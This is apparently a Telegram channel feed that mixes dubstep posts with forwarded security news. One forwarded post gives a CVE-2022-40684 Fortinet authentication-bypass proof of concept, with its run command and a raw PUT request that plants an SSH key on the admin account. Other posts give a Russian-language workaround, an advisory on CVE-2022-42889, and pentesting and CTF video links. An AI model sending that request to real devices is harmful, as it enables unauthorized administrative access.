Devious Methods
194 subscribers
153 photos
14 videos
65 files
535 links
Underground music / Cyberpunk stories
Download Telegram
Forwarded from Private Shizo
exploit.py
1.9 KB
🔥🔥🔥CVE-2022-40684 - Auth bypass extract admin users and LDAP config - This PoC do only read-only actions.

how to use exploit?
python3 exploit.py targetSite
FORTINET NIGHTMARE… xd
Proof of Concept for FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)

💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }


https://github.com/horizon3ai/CVE-2022-40684
🔥1
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад

Summary (Описание):

ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.

Exploitation Status (Статус эксплуатации):

Искать в логах IoC:

user=«Local_Process_Acess»

Workaround (Заплатка на жопу):

FortiOS:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list:

config firewall address

edit "my_allowed_addresses"

set subnet <MY IP> <MY SUBNET>

end


Создать Address Group:

config firewall addrgrp

edit "MGMT_IPs"

set member "my_allowed_addresses"

end



Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:

config firewall local-in-policy

edit 1

set intf port1

set srcaddr "MGMT_IPs"

set dstaddr "all"

set action accept

set service HTTPS HTTP

set schedule "always"

set status enable

next

edit 2

set intf "any"

set srcaddr "all"

set dstaddr "all"

set action deny

set service HTTPS HTTP

set schedule "always"

set status enable

end


FortiProxy:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list для доступа к порту 1:

config system interface

edit port1

set dedicated-to management

set trust-ip-1 <MY IP> <MY SUBNET>

end


FortiSwitchManager:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0

Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
🔥1
Forwarded from k8s (in)security (Дмитрий Евдокимов)
В сети стала доступна видеозапись доклад "Pentesting Kubernetes: From Zero to Hero" (и слайды) от моего коллеги Сергея Канибора с VolgaCTF 2022!

Данный доклад скорее является RoadMap, а не полной инструкцией по пентесту Kubernetes. Уместить некоторые моменты в пределах одного доклада не представляется возможным. Так же как и рассказать о всех возможных техниках и нюансах с которыми можно столкнуться при пентесте Kubernetes кластера. Но мы постарались это рассказать максимально компактно и понятно.

Если вы только начинаете свой путь в этом направлении, то это прям MUST WATCH!
делюсь ништяками…

Wub wub wub dubstep

https://on.soundcloud.com/DSAj4PDXqVz2nBWg8
Forwarded from SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell

Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.

Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
🔥1
OSCE3 holder
🔥1
#DUBSTEP #WAV
786MK001: VA – MORTAL KOMBO #1 EP

Vinyl is OUt Of StoCk..

Only digital form is available on 786 Website.

8 DUBSTEP SUPERHEROES.
4 DEADLY COMBINATIONS.

786MK is MORTAL KOMBO. A new dangerous series.
A collection of 4 spicy collaborations, cooked by some of the most dangerous dubstep producers in the scene.

A1. Mr.K & DPRTNDRP – Suppression Dub
A2. Quasar & nova – Witchcraft Dub
B1. Saule & Centauri – Tyrant
B2. Teffa & Sound Unknown – Hide & Seek
👍1🔥1
Forwarded from Mikrotik Ninja
Пару-тройку недель назад гугл анонсировал свой новый CTF

Если хотите почувстовать себя хакером - добро пожаловать! Я не продвинулся дальше первого уровня ))

Но пост о другом. В рамках этого проекта гуглеры сняли серию видосов про ИБ. И это что-то абсолютно великолепное. Каждая двадцатиминутная серия захватывает как хороший детектив.

Крайне рекомендую посмотреть. Если у вас плохо с английским, то говорят, что Яндекс бразуер умеет переводить видео на лету, сам не проверял

https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H